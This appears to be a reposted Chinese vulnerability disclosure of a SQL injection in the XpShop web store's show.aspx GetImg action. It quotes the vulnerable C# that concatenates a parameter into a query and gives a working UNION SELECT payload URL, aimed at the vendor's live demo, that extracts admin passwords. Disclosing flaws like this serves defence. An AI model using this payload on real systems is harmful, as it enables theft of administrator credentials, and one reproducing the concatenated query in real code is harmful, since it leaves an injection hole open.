xpshop网店系统sql注入一处(官方demo演示)

没穿底裤 2020年1月1日05:58:16评论509 views字数 783阅读2分36秒阅读模式
摘要

漏洞位置xpshop.webui.Show:这里是问题函数,我就不写怎么跟进来的,就是page_load,等下直接用payload测试就好了,官网demo的。


漏洞作者: 不能忍

详细说明:

漏洞位置xpshop.webui.Show:

private void GetImg(string pids) { ProductDB productDB = new ProductDB(); DataTable thumbnailImg = productDB.GetThumbnailImg(pids); thumbnailImg.TableName = "Products"; base.Response.Write(XpShopJson.DtToJSON(thumbnailImg)); }

这里是问题函数,我就不写怎么跟进来的,就是page_load,等下直接用payload测试就好了,官网demo的。

跟进去GetThumbnailImg函数:

public DataTable GetThumbnailImg(string pid) { string commandText = "SELECT ProductID,ProductName,ThumbnailImg,CategoryID,CategoryNo FROM Product WHERE ProductID = " + pid; return XpShopDB.ExecuteDataTable(XpShopDB.ConnectionString, CommandType.Text, commandText, null); }

payload:

http://clothes.xpshop.cn/show.aspx?type=1&action=GetImg&pids=1 union select password,2,3,4,5 from admin--

漏洞证明:

http://clothes.xpshop.cn/show.aspx?type=1&action=GetImg&pids=1 union select password,2,3,4,5 from admin--

xpshop网店系统sql注入一处(官方demo演示)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:58:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   xpshop网店系统sql注入一处(官方demo演示)https://cn-sec.com/archives/76726.html

发表评论

匿名网友 填写信息